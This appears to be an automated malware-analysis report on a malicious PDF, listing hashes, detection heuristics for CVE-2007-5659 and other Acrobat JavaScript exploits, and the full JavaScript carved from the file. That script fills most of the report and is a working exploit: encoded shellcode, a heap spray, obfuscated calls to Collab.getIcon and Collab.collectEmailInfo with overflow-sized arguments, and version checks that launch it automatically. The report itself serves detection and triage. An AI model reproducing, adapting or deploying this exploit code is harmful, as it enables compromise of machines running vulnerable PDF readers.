Malicious PDF — malware analysis report

Static analysis result for SHA-256 dfe2d131ce8f4e92…

MALICIOUS

PDF

28.6 KB Created: 2009-06-26 16:25:57 +08:00 Authoring application: Acrobat PDFMaker 7.0 for Word (via Acrobat Distiller 7.0 (Windows)) First seen: 2012-07-12
MD5: 4cc650350950cd126ce3f3fb98e2e7d4 SHA-1: 0adf8e5940956b869b926f1cf4a84f906ccc288e SHA-256: dfe2d131ce8f4e922012d4225e3a26d79178df6e98aa2efa02d98d5e9015183b
210 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/photoshop/1.0/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x424 5069 bytes
SHA-256: 0beeec19d831a6c6b403495c63ea3075332d25beaf994b9461834bdbd17e00b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function none(a,b)
{
a+b;
}
function repeat(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunescape(buf) {
          var ret='';
          for (var x=0;x < buf.length; x+=2) {
          ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
          }
          return ret;
}
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
var sc = sc1+sc2;
function exploit() {

blah = repeat(128, unescape("%u4647%u4a4b%u4849%u4647%u4849")) + sc;
bigblock = unescape("%u4a4b%u4647");
headersize = 20;
wap = headersize+blah.length;
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
of = repeat(4096, myunescape("0a0a0a0a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65","\x67\x65\x74\x49\x63\x6f\x6e"];var b=[a[0x0]];Collab[a[0x1]](of+b[0x0]);
}

function start() 
{
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc  + repeat(1256,unescape("%u4a4b%u4748"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc  + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"];var b=[];Collab[a[0x0]]({subj:b[0x0],msg:plin});
}
}


if(app.viewerVersion >= 8.0)
{
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else
          exploit();
}
else{
var shaft = app.setTimeOut("start()",1200);
}

Open this report in the interactive analyzer, or submit your own file for analysis.